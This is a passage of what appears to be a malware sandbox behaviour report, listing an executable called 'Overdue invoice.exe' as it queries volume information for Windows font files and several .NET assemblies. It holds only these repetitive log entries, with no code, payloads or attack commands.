                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Users\user\Desktop\Overdue invoice.exe VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
